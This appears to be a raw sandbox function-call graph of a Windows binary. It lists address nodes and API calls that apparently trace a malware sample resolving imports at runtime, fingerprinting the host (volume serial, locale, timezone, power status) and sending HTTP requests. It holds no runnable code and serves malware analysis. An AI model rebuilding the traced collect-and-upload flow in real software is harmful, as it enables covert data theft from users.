14399->14400 14401 fe45c0 2 API calls 14400->14401 14402 fe3cf8 14401->14402 14403 fe45c0 2 API calls 14402->14403 14404 fe3d11 14403->14404 14405 fe45c0 2 API calls 14404->14405 14406 fe3d2a 14405->14406 14407 fe45c0 2 API calls 14406->14407 14408 fe3d43 14407->14408 14409 fe45c0 2 API calls 14408->14409 14410 fe3d5c 14409->14410 14411 fe45c0 2 API calls 14410->14411 14412 fe3d75 14411->14412 14413 fe45c0 2 API calls 14412->14413 14414 fe3d8e 14413->14414 14415 fe45c0 2 API calls 14414->14415 14416 fe3da7 14415->14416 14417 fe45c0 2 API calls 14416->14417 14418 fe3dc0 14417->14418 14419 fe45c0 2 API calls 14418->14419 14420 fe3dd9 14419->14420 14421 fe45c0 2 API calls 14420->14421 14422 fe3df2 14421->14422 14423 fe45c0 2 API calls 14422->14423 14424 fe3e0b 14423->14424 14425 fe45c0 2 API calls 14424->14425 14426 fe3e24 14425->14426 14427 fe45c0 2 API calls 14426->14427 14428 fe3e3d 14427->14428 14429 fe45c0 2 API calls 14428->14429 14430 fe3e56 14429->14430 14431 fe45c0 2 API calls 14430->14431 14432 fe3e6f 14431->14432 14433 fe45c0 2 API calls 14432->14433 14434 fe3e88 14433->14434 14435 fe45c0 2 API calls 14434->14435 14436 fe3ea1 14435->14436 14437 fe45c0 2 API calls 14436->14437 14438 fe3eba 14437->14438 14439 fe45c0 2 API calls 14438->14439 14440 fe3ed3 14439->14440 14441 fe45c0 2 API calls 14440->14441 14442 fe3eec 14441->14442 14443 fe45c0 2 API calls 14442->14443 14444 fe3f05 14443->14444 14445 fe45c0 2 API calls 14444->14445 14446 fe3f1e 14445->14446 14447 fe45c0 2 API calls 14446->14447 14448 fe3f37 14447->14448 14449 fe45c0 2 API calls 14448->14449 14450 fe3f50 14449->14450 14451 fe45c0 2 API calls 14450->14451 14452 fe3f69 14451->14452 14453 fe45c0 2 API calls 14452->14453 14454 fe3f82 14453->14454 14455 fe45c0 2 API calls 14454->14455 14456 fe3f9b 14455->14456 14457 fe45c0 2 API calls 14456->14457 14458 fe3fb4 14457->14458 14459 fe45c0 2 API calls 14458->14459 14460 fe3fcd 14459->14460 14461 fe45c0 2 API calls 14460->14461 14462 fe3fe6 14461->14462 14463 fe45c0 2 API calls 14462->14463 14464 fe3fff 14463->14464 14465 fe45c0 2 API calls 14464->14465 14466 fe4018 14465->14466 14467 fe45c0 2 API calls 14466->14467 14468 fe4031 14467->14468 14469 fe45c0 2 API calls 14468->14469 14470 fe404a 14469->14470 14471 fe45c0 2 API calls 14470->14471 14472 fe4063 14471->14472 14473 fe45c0 2 API calls 14472->14473 14474 fe407c 14473->14474 14475 fe45c0 2 API calls 14474->14475 14476 fe4095 14475->14476 14477 fe45c0 2 API calls 14476->14477 14478 fe40ae 14477->14478 14479 fe45c0 2 API calls 14478->14479 14480 fe40c7 14479->14480 14481 fe45c0 2 API calls 14480->14481 14482 fe40e0 14481->14482 14483 fe45c0 2 API calls 14482->14483 14484 fe40f9 14483->14484 14485 fe45c0 2 API calls 14484->14485 14486 fe4112 14485->14486 14487 fe45c0 2 API calls 14486->14487 14488 fe412b 14487->14488 14489 fe45c0 2 API calls 14488->14489 14490 fe4144 14489->14490 14491 fe45c0 2 API calls 14490->14491 14492 fe415d 14491->14492 14493 fe45c0 2 API calls 14492->14493 14494 fe4176 14493->14494 14495 fe45c0 2 API calls 14494->14495 14496 fe418f 14495->14496 14497 fe45c0 2 API calls 14496->14497 14498 fe41a8 14497->14498 14499 fe45c0 2 API calls 14498->14499 14500 fe41c1 14499->14500 14501 fe45c0 2 API calls 14500->14501 14502 fe41da 14501->14502 14503 fe45c0 2 API calls 14502->14503 14504 fe41f3 14503->14504 14505 fe45c0 2 API calls 14504->14505 14506 fe420c 14505->14506 14507 fe45c0 2 API calls 14506->14507 14508 fe4225 14507->14508 14509 fe45c0 2 API calls 14508->14509 14510 fe423e 14509->14510 14511 fe45c0 2 API calls 14510->14511 14512 fe4257 14511->14512 14513 fe45c0 2 API calls 14512->14513 14514 fe4270 14513->14514 14515 fe45c0 2 API calls 14514->14515 14516 fe4289 14515->14516 14517 fe45c0 2 API calls 14516->14517 14518 fe42a2 14517->14518 14519 fe45c0 2 API calls 14518->14519 14520 fe42bb 14519->14520 14521 fe45c0 2 API calls 14520->14521 14522 fe42d4 14521->14522 14523 fe45c0 2 API calls 14522->14523 14524 fe42ed 14523->14524 14525 fe45c0 2 API calls 14524->14525 14526 fe4306 14525->14526 14527 fe45c0 2 API calls 14526->14527 14528 fe431f 14527->14528 14529 fe45c0 2 API calls 14528->14529 14530 fe4338 14529->14530 14531 fe45c0 2 API calls 14530->14531 14532 fe4351 14531->14532 14533 fe45c0 2 API calls 14532->14533 14534 fe436a 14533->14534 14535 fe45c0 2 API calls 14534->14535 14536 fe4383 14535->14536 14537 fe45c0 2 API calls 14536->14537 14538 fe439c 14537->14538 14539 fe45c0 2 API calls 14538->14539 14540 fe43b5 14539->14540 14541 fe45c0 2 API calls 14540->14541 14542 fe43ce 14541->14542 14543 fe45c0 2 API calls 14542->14543 14544 fe43e7 14543->14544 14545 fe45c0 2 API calls 14544->14545 14546 fe4400 14545->14546 14547 fe45c0 2 API calls 14546->14547 14548 fe4419 14547->14548 14549 fe45c0 2 API calls 14548->14549 14550 fe4432 14549->14550 14551 fe45c0 2 API calls 14550->14551 14552 fe444b 14551->14552 14553 fe45c0 2 API calls 14552->14553 14554 fe4464 14553->14554 14555 fe45c0 2 API calls 14554->14555 14556 fe447d 14555->14556 14557 fe45c0 2 API calls 14556->14557 14558 fe4496 14557->14558 14559 fe45c0 2 API calls 14558->14559 14560 fe44af 14559->14560 14561 fe45c0 2 API calls 14560->14561 14562 fe44c8 14561->14562 14563 fe45c0 2 API calls 14562->14563 14564 fe44e1 14563->14564 14565 fe45c0 2 API calls 14564->14565 14566 fe44fa 14565->14566 14567 fe45c0 2 API calls 14566->14567 14568 fe4513 14567->14568 14569 fe45c0 2 API calls 14568->14569 14570 fe452c 14569->14570 14571 fe45c0 2 API calls 14570->14571 14572 fe4545 14571->14572 14573 fe45c0 2 API calls 14572->14573 14574 fe455e 14573->14574 14575 fe45c0 2 API calls 14574->14575 14576 fe4577 14575->14576 14577 fe45c0 2 API calls 14576->14577 14578 fe4590 14577->14578 14579 fe45c0 2 API calls 14578->14579 14580 fe45a9 14579->14580 14581 ff9c10 14580->14581 14582 ffa036 8 API calls 14581->14582 14583 ff9c20 43 API calls 14581->14583 14584 ffa0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14582->14584 14585 ffa146 14582->14585 14583->14582 14584->14585 14586 ffa216 14585->14586 14587 ffa153 8 API calls 14585->14587 14588 ffa21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14586->14588 14589 ffa298 14586->14589 14587->14586 14588->14589 14590 ffa337 14589->14590 14591 ffa2a5 6 API calls 14589->14591 14592 ffa41f 14590->14592 14593 ffa344 9 API calls 14590->14593 14591->14590 14594 ffa428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14592->14594 14595 ffa4a2 14592->14595 14593->14592 14594->14595 14596 ffa4dc 14595->14596 14597 ffa4ab GetProcAddress GetProcAddress 14595->14597 14598 ffa515 14596->14598 14599 ffa4e5 GetProcAddress GetProcAddress 14596->14599 14597->14596 14600 ffa612 14598->14600 14601 ffa522 10 API calls 14598->14601 14599->14598 14602 ffa67d 14600->14602 14603 ffa61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14600->14603 14601->14600 14604 ffa69e 14602->14604 14605 ffa686 GetProcAddress 14602->14605 14603->14602 14606 ff5ca3 14604->14606 14607 ffa6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14604->14607 14605->14604 14608 fe1590 14606->14608 14607->14606 15730 fe1670 14608->15730 14611 ffa7a0 lstrcpy 14612 fe15b5 14611->14612 14613 ffa7a0 lstrcpy 14612->14613 14614 fe15c7 14613->14614 14615 ffa7a0 lstrcpy 14614->14615 14616 fe15d9 14615->14616 14617 ffa7a0 lstrcpy 14616->14617 14618 fe1663 14617->14618 14619 ff5510 14618->14619 14620 ff5521 14619->14620 14621 ffa820 2 API calls 14620->14621 14622 ff552e 14621->14622 14623 ffa820 2 API calls 14622->14623 14624 ff553b 14623->14624 14625 ffa820 2 API calls 14624->14625 14626 ff5548 14625->14626 14627 ffa740 lstrcpy 14626->14627 14628 ff5555 14627->14628 14629 ffa740 lstrcpy 14628->14629 14630 ff5562 14629->14630 14631 ffa740 lstrcpy 14630->14631 14632 ff556f 14631->14632 14633 ffa740 lstrcpy 14632->14633 14651 ff557c 14633->14651 14634 ffa740 lstrcpy 14634->14651 14635 ffa820 lstrlen lstrcpy 14635->14651 14636 ff5643 StrCmpCA 14636->14651 14637 ff56a0 StrCmpCA 14638 ff57dc 14637->14638 14637->14651 14639 ffa8a0 lstrcpy 14638->14639 14640 ff57e8 14639->14640 14641 ffa820 2 API calls 14640->14641 14644 ff57f6 14641->14644 14642 ff5856 StrCmpCA 14646 ff5991 14642->14646 14642->14651 14643 ff51f0 20 API calls 14643->14651 14645 ffa820 2 API calls 14644->14645 14647 ff5805 14645->14647 14648 ffa8a0 lstrcpy 14646->14648 14649 fe1670 lstrcpy 14647->14649 14650 ff599d 14648->14650 14672 ff5811 14649->14672 14652 ffa820 2 API calls 14650->14652 14651->14634 14651->14635 14651->14636 14651->14637 14651->14642 14651->14643 14654 ff5a0b StrCmpCA 14651->14654 14655 ff52c0 25 API calls 14651->14655 14667 ff578a StrCmpCA 14651->14667 14669 ffa7a0 lstrcpy 14651->14669 14670 ff593f StrCmpCA 14651->14670 14671 ffa8a0 lstrcpy 14651->14671 14673 fe1590 lstrcpy 14651->14673 14653 ff59ab 14652->14653 14656 ffa820 2 API calls 14653->14656 14657 ff5a28 14654->14657 14658 ff5a16 Sleep 14654->14658 14655->14651 14659 ff59ba 14656->14659 14660 ffa8a0 lstrcpy 14657->14660 14658->14651 14661 fe1670 lstrcpy 14659->14661 14662 ff5a34 14660->14662 14661->14672 14663 ffa820 2 API calls 14662->14663 14664 ff5a43 14663->14664 14665 ffa820 2 API calls 14664->14665 14666 ff5a52 14665->14666 14668 fe1670 lstrcpy 14666->14668 14667->14651 14668->14672 14669->14651 14670->14651 14671->14651 14672->13726 14673->14651 14675 ff754c 14674->14675 14676 ff7553 GetVolumeInformationA 14674->14676 14675->14676 14677 ff7591 14676->14677 14678 ff75fc GetProcessHeap RtlAllocateHeap 14677->14678 14679 ff7619 14678->14679 14680 ff7628 wsprintfA 14678->14680 14681 ffa740 lstrcpy 14679->14681 14682 ffa740 lstrcpy 14680->14682 14683 ff5da7 14681->14683 14682->14683 14683->13747 14685 ffa7a0 lstrcpy 14684->14685 14686 fe4899 14685->14686 15739 fe47b0 14686->15739 14688 fe48a5 14689 ffa740 lstrcpy 14688->14689 14690 fe48d7 14689->14690 14691 ffa740 lstrcpy 14690->14691 14692 fe48e4 14691->14692 14693 ffa740 lstrcpy 14692->14693 14694 fe48f1 14693->14694 14695 ffa740 lstrcpy 14694->14695 14696 fe48fe 14695->14696 14697 ffa740 lstrcpy 14696->14697 14698 fe490b InternetOpenA StrCmpCA 14697->14698 14699 fe4944 14698->14699 14700 fe4ecb InternetCloseHandle 14699->14700 14701 fe4955 14699->14701 14703 fe4ee8 14700->14703 15750 ff8b60 14701->15750 15745 fe9ac0 CryptStringToBinaryA 14703->15745 14704 fe4963 15758 ffa920 14704->15758 14707 fe4976 14709 ffa8a0 lstrcpy 14707->14709 14714 fe497f 14709->14714 14710 ffa820 2 API calls 14711 fe4f05 14710->14711 14712 ffa9b0 4 API calls 14711->14712 14715 fe4f1b 14712->14715 14713 fe4f27 codecvt 14717 ffa7a0 lstrcpy 14713->14717 14718 ffa9b0 4 API calls 14714->14718 14716 ffa8a0 lstrcpy 14715->14716 14716->14713 14730 fe4f57 14717->14730 14719 fe49a9 14718->14719 14720 ffa8a0 lstrcpy 14719->14720 14721 fe49b2 14720->14721 14722 ffa9b0 4 API calls 14721->14722 14723 fe49d1 14722->14723 14724 ffa8a0 lstrcpy 14723->14724 14725 fe49da 14724->14725 14726 ffa920 3 API calls 14725->14726 14727 fe49f8 14726->14727 14728 ffa8a0 lstrcpy 14727->14728 14729 fe4a01 14728->14729 14731 ffa9b0 4 API calls 14729->14731 14730->13750 14732 fe4a20 14731->14732 14733 ffa8a0 lstrcpy 14732->14733 14734 fe4a29 14733->14734 14735 ffa9b0 4 API calls 14734->14735 14736 fe4a48 14735->14736 14737 ffa8a0 lstrcpy 14736->14737 14738 fe4a51 14737->14738 14739 ffa9b0 4 API calls 14738->14739 14740 fe4a7d 14739->14740 14741 ffa920 3 API calls 14740->14741 14742 fe4a84 14741->14742 14743 ffa8a0 lstrcpy 14742->14743 14744 fe4a8d 14743->14744 14745 fe4aa3 InternetConnectA 14744->14745 14745->14700 14746 fe4ad3 HttpOpenRequestA 14745->14746 14748 fe4ebe InternetCloseHandle 14746->14748 14749 fe4b28 14746->14749 14748->14700 14750 ffa9b0 4 API calls 14749->14750 14751 fe4b3c 14750->14751 14752 ffa8a0 lstrcpy 14751->14752 14753 fe4b45 14752->14753 14754 ffa920 3 API calls 14753->14754 14755 fe4b63 14754->14755 14756 ffa8a0 lstrcpy 14755->14756 14757 fe4b6c 14756->14757 14758 ffa9b0 4 API calls 14757->14758 14759 fe4b8b 14758->14759 14760 ffa8a0 lstrcpy 14759->14760 14761 fe4b94 14760->14761 14762 ffa9b0 4 API calls 14761->14762 14763 fe4bb5 14762->14763 14764 ffa8a0 lstrcpy 14763->14764 14765 fe4bbe 14764->14765 14766 ffa9b0 4 API calls 14765->14766 14767 fe4bde 14766->14767 14768 ffa8a0 lstrcpy 14767->14768 14769 fe4be7 14768->14769 14770 ffa9b0 4 API calls 14769->14770 14771 fe4c06 14770->14771 14772 ffa8a0 lstrcpy 14771->14772 14773 fe4c0f 14772->14773 14774 ffa920 3 API calls 14773->14774 14775 fe4c2d 14774->14775 14776 ffa8a0 lstrcpy 14775->14776 14777 fe4c36 14776->14777 14778 ffa9b0 4 API calls 14777->14778 14779 fe4c55 14778->14779 14780 ffa8a0 lstrcpy 14779->14780 14781 fe4c5e 14780->14781 14782 ffa9b0 4 API calls 14781->14782 14783 fe4c7d 14782->14783 14784 ffa8a0 lstrcpy 14783->14784 14785 fe4c86 14784->14785 14786 ffa920 3 API calls 14785->14786 14787 fe4ca4 14786->14787 14788 ffa8a0 lstrcpy 14787->14788 14789 fe4cad 14788->14789 14790 ffa9b0 4 API calls 14789->14790 14791 fe4ccc 14790->14791 14792 ffa8a0 lstrcpy 14791->14792 14793 fe4cd5 14792->14793 14794 ffa9b0 4 API calls 14793->14794 14795 fe4cf6 14794->14795 14796 ffa8a0 lstrcpy 14795->14796 14797 fe4cff 14796->14797 14798 ffa9b0 4 API calls 14797->14798 14799 fe4d1f 14798->14799 14800 ffa8a0 lstrcpy 14799->14800 14801 fe4d28 14800->14801 14802 ffa9b0 4 API calls 14801->14802 14803 fe4d47 14802->14803 14804 ffa8a0 lstrcpy 14803->14804 14805 fe4d50 14804->14805 14806 ffa920 3 API calls 14805->14806 14807 fe4d6e 14806->14807 14808 ffa8a0 lstrcpy 14807->14808 14809 fe4d77 14808->14809 14810 ffa740 lstrcpy 14809->14810 14811 fe4d92 14810->14811 14812 ffa920 3 API calls 14811->14812 14813 fe4db3 14812->14813 14814 ffa920 3 API calls 14813->14814 14815 fe4dba 14814->14815 14816 ffa8a0 lstrcpy 14815->14816 14817 fe4dc6 14816->14817 14818 fe4de7 lstrlen 14817->14818 14819 fe4dfa 14818->14819 14820 fe4e03 lstrlen 14819->14820 15764 ffaad0 14820->15764 14822 fe4e13 HttpSendRequestA 14823 fe4e32 InternetReadFile 14822->14823 14824 fe4e67 InternetCloseHandle 14823->14824 14829 fe4e5e 14823->14829 14827 ffa800 14824->14827 14826 ffa9b0 4 API calls 14826->14829 14827->14748 14828 ffa8a0 lstrcpy 14828->14829 14829->14823 14829->14824 14829->14826 14829->14828 15766 ffaad0 14830->15766 14832 ff17c4 StrCmpCA 14833 ff17cf ExitProcess 14832->14833 14837 ff17d7 14832->14837 14834 ff19c2 14834->13752 14835 ff187f StrCmpCA 14835->14837 14836 ff185d StrCmpCA 14836->14837 14837->14834 14837->14835 14837->14836 14838 ff1913 StrCmpCA 14837->14838 14839 ff1932 StrCmpCA 14837->14839 14840 ff18f1 StrCmpCA 14837->14840 14841 ff1951 StrCmpCA 14837->14841 14842 ff1970 StrCmpCA 14837->14842 14843 ff18cf StrCmpCA 14837->14843 14844 ff18ad StrCmpCA 14837->14844 14845 ffa820 lstrlen lstrcpy 14837->14845 14838->14837 14839->14837 14840->14837 14841->14837 14842->14837 14843->14837 14844->14837 14845->14837 14847 ffa7a0 lstrcpy 14846->14847 14848 fe5979 14847->14848 14849 fe47b0 2 API calls 14848->14849 14850 fe5985 14849->14850 14851 ffa740 lstrcpy 14850->14851 14852 fe59ba 14851->14852 14853 ffa740 lstrcpy 14852->14853 14854 fe59c7 14853->14854 14855 ffa740 lstrcpy 14854->14855 14856 fe59d4 14855->14856 14857 ffa740 lstrcpy 14856->14857 14858 fe59e1 14857->14858 14859 ffa740 lstrcpy 14858->14859 14860 fe59ee InternetOpenA StrCmpCA 14859->14860 14861 fe5a1d 14860->14861 14862 fe5fc3 InternetCloseHandle 14861->14862 14863 ff8b60 3 API calls 14861->14863 14864 fe5fe0 14862->14864 14865 fe5a3c 14863->14865 14867 fe9ac0 4 API calls 14864->14867 14866 ffa920 3 API calls 14865->14866 14868 fe5a4f 14866->14868 14869 fe5fe6 14867->14869 14870 ffa8a0 lstrcpy 14868->14870 14871 ffa820 2 API calls 14869->14871 14874 fe601f codecvt 14869->14874 14875 fe5a58 14870->14875 14872 fe5ffd 14871->14872 14873 ffa9b0 4 API calls 14872->14873 14876 fe6013 14873->14876 14878 ffa7a0 lstrcpy 14874->14878 14879 ffa9b0 4 API calls 14875->14879 14877 ffa8a0 lstrcpy 14876->14877 14877->14874 14887 fe604f 14878->14887 14880 fe5a82 14879->14880 14881 ffa8a0 lstrcpy 14880->14881 14882 fe5a8b 14881->14882 14883 ffa9b0 4 API calls 14882->14883 14884 fe5aaa 14883->14884 14885 ffa8a0 lstrcpy 14884->14885 14886 fe5ab3 14885->14886 14888 ffa920 3 API calls 14886->14888 14887->13758 14889 fe5ad1 14888->14889 14890 ffa8a0 lstrcpy 14889->14890 14891 fe5ada 14890->14891 14892 ffa9b0 4 API calls 14891->14892 14893 fe5af9 14892->14893 14894 ffa8a0 lstrcpy 14893->14894 14895 fe5b02 14894->14895 14896 ffa9b0 4 API calls 14895->14896 14897 fe5b21 14896->14897 14898 ffa8a0 lstrcpy 14897->14898 14899 fe5b2a 14898->14899 14900 ffa9b0 4 API calls 14899->14900 14901 fe5b56 14900->14901 14902 ffa920 3 API calls 14901->14902 14903 fe5b5d 14902->14903 14904 ffa8a0 lstrcpy 14903->14904 14905 fe5b66 14904->14905 14906 fe5b7c InternetConnectA 14905->14906 14906->14862 14907 fe5bac HttpOpenRequestA 14906->14907 14909 fe5c0b 14907->14909 14910 fe5fb6 InternetCloseHandle 14907->14910 14911 ffa9b0 4 API calls 14909->14911 14910->14862 14912 fe5c1f 14911->14912 14913 ffa8a0 lstrcpy 14912->14913 14914 fe5c28 14913->14914 14915 ffa920 3 API calls 14914->14915 14916 fe5c46 14915->14916 14917 ffa8a0 lstrcpy 14916->14917 14918 fe5c4f 14917->14918 14919 ffa9b0 4 API calls 14918->14919 14920 fe5c6e 14919->14920 14921 ffa8a0 lstrcpy 14920->14921 14922 fe5c77 14921->14922 14923 ffa9b0 4 API calls 14922->14923 14924 fe5c98 14923->14924 14925 ffa8a0 lstrcpy 14924->14925 14926 fe5ca1 14925->14926 14927 ffa9b0 4 API calls 14926->14927 14928 fe5cc1 14927->14928 14929 ffa8a0 lstrcpy 14928->14929 14930 fe5cca 14929->14930 14931 ffa9b0 4 API calls 14930->14931 14932 fe5ce9 14931->14932 14933 ffa8a0 lstrcpy 14932->14933 14934 fe5cf2 14933->14934 14935 ffa920 3 API calls 14934->14935 14936 fe5d10 14935->14936 14937 ffa8a0 lstrcpy 14936->14937 14938 fe5d19 14937->14938 14939 ffa9b0 4 API calls 14938->14939 14940 fe5d38 14939->14940 14941 ffa8a0 lstrcpy 14940->14941 14942 fe5d41 14941->14942 14943 ffa9b0 4 API calls 14942->14943 14944 fe5d60 14943->14944 14945 ffa8a0 lstrcpy 14944->14945 14946 fe5d69 14945->14946 14947 ffa920 3 API calls 14946->14947 14948 fe5d87 14947->14948 14949 ffa8a0 lstrcpy 14948->14949 14950 fe5d90 14949->14950 14951 ffa9b0 4 API calls 14950->14951 14952 fe5daf 14951->14952 14953 ffa8a0 lstrcpy 14952->14953 14954 fe5db8 14953->14954 14955 ffa9b0 4 API calls 14954->14955 14956 fe5dd9 14955->14956 14957 ffa8a0 lstrcpy 14956->14957 14958 fe5de2 14957->14958 14959 ffa9b0 4 API calls 14958->14959 14960 fe5e02 14959->14960 14961 ffa8a0 lstrcpy 14960->14961 14962 fe5e0b 14961->14962 14963 ffa9b0 4 API calls 14962->14963 14964 fe5e2a 14963->14964 14965 ffa8a0 lstrcpy 14964->14965 14966 fe5e33 14965->14966 14967 ffa920 3 API calls 14966->14967 14968 fe5e54 14967->14968 14969 ffa8a0 lstrcpy 14968->14969 14970 fe5e5d 14969->14970 14971 fe5e70 lstrlen 14970->14971 15767 ffaad0 14971->15767 14973 fe5e81 lstrlen GetProcessHeap RtlAllocateHeap 15768 ffaad0 14973->15768 14975 fe5eae lstrlen 14976 fe5ebe 14975->14976 14977 fe5ed7 lstrlen 14976->14977 14978 fe5ee7 14977->14978 14979 fe5ef0 lstrlen 14978->14979 14980 fe5f04 14979->14980 14981 fe5f1a lstrlen 14980->14981 15769 ffaad0 14981->15769 14983 fe5f2a HttpSendRequestA 14984 fe5f35 InternetReadFile 14983->14984 14985 fe5f6a InternetCloseHandle 14984->14985 14989 fe5f61 14984->14989 14985->14910 14987 ffa9b0 4 API calls 14987->14989 14988 ffa8a0 lstrcpy 14988->14989 14989->14984 14989->14985 14989->14987 14989->14988 14992 ff1077 14990->14992 14991 ff1151 14991->13760 14992->14991 14993 ffa820 lstrlen lstrcpy 14992->14993 14993->14992 14996 ff0db7 14994->14996 14995 ff0f17 14995->13768 14996->14995 14997 ff0e27 StrCmpCA 14996->14997 14998 ff0e67 StrCmpCA 14996->14998 14999 ff0ea4 StrCmpCA 14996->14999 15000 ffa820 lstrlen lstrcpy 14996->15000 14997->14996 14998->14996 14999->14996 15000->14996 15002 ff0f67 15001->15002 15003 ff1044 15002->15003 15004 ff0fb2 StrCmpCA 15002->15004 15005 ffa820 lstrlen lstrcpy 15002->15005 15003->13776 15004->15002 15005->15002 15007 ffa740 lstrcpy 15006->15007 15008 ff1a26 15007->15008 15009 ffa9b0 4 API calls 15008->15009 15010 ff1a37 15009->15010 15011 ffa8a0 lstrcpy 15010->15011 15012 ff1a40 15011->15012 15013 ffa9b0 4 API calls 15012->15013 15014 ff1a5b 15013->15014 15015 ffa8a0 lstrcpy 15014->15015 15016 ff1a64 15015->15016 15017 ffa9b0 4 API calls 15016->15017 15018 ff1a7d 15017->15018 15019 ffa8a0 lstrcpy 15018->15019 15020 ff1a86 15019->15020 15021 ffa9b0 4 API calls 15020->15021 15022 ff1aa1 15021->15022 15023 ffa8a0 lstrcpy 15022->15023 15024 ff1aaa 15023->15024 15025 ffa9b0 4 API calls 15024->15025 15026 ff1ac3 15025->15026 15027 ffa8a0 lstrcpy 15026->15027 15028 ff1acc 15027->15028 15029 ffa9b0 4 API calls 15028->15029 15030 ff1ae7 15029->15030 15031 ffa8a0 lstrcpy 15030->15031 15032 ff1af0 15031->15032 15033 ffa9b0 4 API calls 15032->15033 15034 ff1b09 15033->15034 15035 ffa8a0 lstrcpy 15034->15035 15036 ff1b12 15035->15036 15037 ffa9b0 4 API calls 15036->15037 15038 ff1b2d 15037->15038 15039 ffa8a0 lstrcpy 15038->15039 15040 ff1b36 15039->15040 15041 ffa9b0 4 API calls 15040->15041 15042 ff1b4f 15041->15042 15043 ffa8a0 lstrcpy 15042->15043 15044 ff1b58 15043->15044 15045 ffa9b0 4 API calls 15044->15045 15046 ff1b76 15045->15046 15047 ffa8a0 lstrcpy 15046->15047 15048 ff1b7f 15047->15048 15049 ff7500 6 API calls 15048->15049 15050 ff1b96 15049->15050 15051 ffa920 3 API calls 15050->15051 15052 ff1ba9 15051->15052 15053 ffa8a0 lstrcpy 15052->15053 15054 ff1bb2 15053->15054 15055 ffa9b0 4 API calls 15054->15055 15056 ff1bdc 15055->15056 15057 ffa8a0 lstrcpy 15056->15057 15058 ff1be5 15057->15058 15059 ffa9b0 4 API calls 15058->15059 15060 ff1c05 15059->15060 15061 ffa8a0 lstrcpy 15060->15061 15062 ff1c0e 15061->15062 15770 ff7690 GetProcessHeap RtlAllocateHeap 15062->15770 15065 ffa9b0 4 API calls 15066 ff1c2e 15065->15066 15067 ffa8a0 lstrcpy 15066->15067 15068 ff1c37 15067->15068 15069 ffa9b0 4 API calls 15068->15069 15070 ff1c56 15069->15070 15071 ffa8a0 lstrcpy 15070->15071 15072 ff1c5f 15071->15072 15073 ffa9b0 4 API calls 15072->15073 15074 ff1c80 15073->15074 15075 ffa8a0 lstrcpy 15074->15075 15076 ff1c89 15075->15076 15777 ff77c0 GetCurrentProcess IsWow64Process 15076->15777 15079 ffa9b0 4 API calls 15080 ff1ca9 15079->15080 15081 ffa8a0 lstrcpy 15080->15081 15082 ff1cb2 15081->15082 15083 ffa9b0 4 API calls 15082->15083 15084 ff1cd1 15083->15084 15085 ffa8a0 lstrcpy 15084->15085 15086 ff1cda 15085->15086 15087 ffa9b0 4 API calls 15086->15087 15088 ff1cfb 15087->15088 15089 ffa8a0 lstrcpy 15088->15089 15090 ff1d04 15089->15090 15091 ff7850 3 API calls 15090->15091 15092 ff1d14 15091->15092 15093 ffa9b0 4 API calls 15092->15093 15094 ff1d24 15093->15094 15095 ffa8a0 lstrcpy 15094->15095 15096 ff1d2d 15095->15096 15097 ffa9b0 4 API calls 15096->15097 15098 ff1d4c 15097->15098 15099 ffa8a0 lstrcpy 15098->15099 15100 ff1d55 15099->15100 15101 ffa9b0 4 API calls 15100->15101 15102 ff1d75 15101->15102 15103 ffa8a0 lstrcpy 15102->15103 15104 ff1d7e 15103->15104 15105 ff78e0 3 API calls 15104->15105 15106 ff1d8e 15105->15106 15107 ffa9b0 4 API calls 15106->15107 15108 ff1d9e 15107->15108 15109 ffa8a0 lstrcpy 15108->15109 15110 ff1da7 15109->15110 15111 ffa9b0 4 API calls 15110->15111 15112 ff1dc6 15111->15112 15113 ffa8a0 lstrcpy 15112->15113 15114 ff1dcf 15113->15114 15115 ffa9b0 4 API calls 15114->15115 15116 ff1df0 15115->15116 15117 ffa8a0 lstrcpy 15116->15117 15118 ff1df9 15117->15118 15779 ff7980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15118->15779 15121 ffa9b0 4 API calls 15122 ff1e19 15121->15122 15123 ffa8a0 lstrcpy 15122->15123 15124 ff1e22 15123->15124 15125 ffa9b0 4 API calls 15124->15125 15126 ff1e41 15125->15126 15127 ffa8a0 lstrcpy 15126->15127 15128 ff1e4a 15127->15128 15129 ffa9b0 4 API calls 15128->15129 15130 ff1e6b 15129->15130 15131 ffa8a0 lstrcpy 15130->15131 15132 ff1e74 15131->15132 15781 ff7a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15132->15781 15135 ffa9b0 4 API calls 15136 ff1e94 15135->15136 15137 ffa8a0 lstrcpy 15136->15137 15138 ff1e9d 15137->15138 15139 ffa9b0 4 API calls 15138->15139 15140 ff1ebc 15139->15140 15141 ffa8a0 lstrcpy 15140->15141 15142 ff1ec5 15141->15142 15143 ffa9b0 4 API calls 15142->15143 15144 ff1ee5 15143->15144 15145 ffa8a0 lstrcpy 15144->15145 15146 ff1eee 15145->15146 15784 ff7b00 GetUserDefaultLocaleName 15146->15784 15149 ffa9b0 4 API calls 15150 ff1f0e 15149->15150 15151 ffa8a0 lstrcpy 15150->15151 15152 ff1f17 15151->15152 15153 ffa9b0 4 API calls 15152->15153 15154 ff1f36 15153->15154 15155 ffa8a0 lstrcpy 15154->15155 15156 ff1f3f 15155->15156 15157 ffa9b0 4 API calls 15156->15157 15158 ff1f60 15157->15158 15159 ffa8a0 lstrcpy 15158->15159 15160 ff1f69 15159->15160 15788 ff7b90 15160->15788 15162 ff1f80 15163 ffa920 3 API calls 15162->15163 15164 ff1f93 15163->15164 15165 ffa8a0 lstrcpy 15164->15165 15166 ff1f9c 15165->15166 15167 ffa9b0 4 API calls 15166->15167 15168 ff1fc6 15167->15168 15169 ffa8a0 lstrcpy 15168->15169 15170 ff1fcf 15169->15170 15171 ffa9b0 4 API calls 15170->15171 15172 ff1fef 15171->15172 15173 ffa8a0 lstrcpy 15172->15173 15174 ff1ff8 15173->15174 15800 ff7d80 GetSystemPowerStatus 15174->15800 15177 ffa9b0 4 API calls 15178 ff2018 15177->15178 15179 ffa8a0 lstrcpy 15178->15179 15180 ff2021 15179->15180 15181 ffa9b0 4 API calls 15180->15181 15182 ff2040 15181->15182 15183 ffa8a0 lstrcpy 15182->15183 15184 ff2049 15183->15184 15185 ffa9b0 4 API calls 15184->15185 15186 ff206a 15185->15186 15187 ffa8a0 lstrcpy 15186->15187 15188 ff2073 15187->15188 15189 ff207e GetCurrentProcessId 15188->15189 15802 ff9470 OpenProcess 15189->15802 15192 ffa920 3 API calls 15193 ff20a4 15192->15193 15194 ffa8a0 